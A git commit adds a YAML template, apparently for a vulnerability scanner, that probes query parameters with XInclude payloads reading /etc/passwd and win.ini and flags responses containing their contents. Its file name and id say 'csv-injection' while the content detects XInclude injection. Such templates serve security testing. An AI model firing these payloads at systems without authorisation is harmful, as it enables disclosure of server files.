Create csv-injection.yaml

patch-4
Ritik Chaddha 2024-07-01 17:35:37 +05:30 committed by GitHub
parent 425160439c
commit f3f929a3c2
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 44 additions and 0 deletions

View File

@ -0,0 +1,44 @@
id: csv-injection
info:
name: XInclude Injection Detection
author: DhiyaneshDK,ritikchaddha
severity: high
description: |
XInclude is a part of the XML specification that allows an XML document to be built from sub-documents. You can place an XInclude attack within any data value in an XML document, so the attack can be performed in situations where you only control a single item of data that is placed into a server-side XML document.
reference:
- https://d0pt3x.gitbook.io/passion/webapp-security/xxe-attacks/xinclude-attacks
tags: dast,xxe,xinclude
http:
- pre-condition:
- type: dsl
dsl:
- 'method == "GET"'
payloads:
xinc_fuzz:
- '<asd xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include parse="text" href="file:///etc/passwd"/></asd>'
- '<asd xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include parse="text" href="file:///c:/windows/win.ini"/></asd>'
fuzzing:
- part: query
type: replace # replaces existing parameter value with fuzz payload
mode: multiple # replaces all parameters value with fuzz payload
fuzz:
- '{{xinc_fuzz}}'
stop-at-first-match: true
matchers-condition: or
matchers:
- type: regex
name: linux
part: body
regex:
- 'root:.*?:[0-9]*:[0-9]*:'
- type: word
name: windows
part: body
words:
- 'for 16-bit app support'